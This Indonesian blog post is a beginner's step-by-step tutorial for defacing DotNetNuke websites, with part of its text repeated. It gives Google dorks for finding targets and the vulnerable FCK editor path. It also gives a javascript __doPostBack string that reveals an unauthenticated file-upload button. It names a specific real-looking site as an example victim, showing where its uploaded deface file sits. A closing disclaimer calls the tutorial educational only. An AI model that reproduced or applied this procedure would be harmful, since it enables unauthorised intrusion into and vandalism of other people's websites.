Tutorial Deface Dengan DNN | Newbie Only
Selasa, 12 Maret 2013
Add Comment
Tutorial Deface Dengan DNN | Newbie Only - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Tutorial Deface Dengan DNN | Newbie Only, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.
Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Nanti akan menjadi seperti ini :
Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Tutorial Deface Dengan DNN | Newbie Only.
Kali ini saya akan share teknik deface dengan Dot Net Nuke atau biasa disebut DNN. Teknik ini sangat mudah sehingga cocok untuk pembelajaran bagi pemula. Untuk yang udah master lebih baik merem dulu. :v
Oke, langsung saja.
Google Dork :
- inurl:”/portals/0″
- inurl:fcklinkgallery.aspx
Dork lain silahkan dikembangkan sendiri.
Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Nanti akan menjadi seperti ini :
Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile
Sehinga hasil deface saya terletak di :
http://www.caslpo.com/portals/0/jkt.txt
Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.
- NB : Ekstensi file yang bisa di upload adalah : swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob . Kalian tidak bisa upload shell php !
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Tutorial Deface Dengan DNN | Newbie Only.
Terima kasih telah membaca artikel Tutorial Deface Dengan DNN | Newbie Only, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Tutorial Deface Dengan DNN | Newbie Only"
Posting Komentar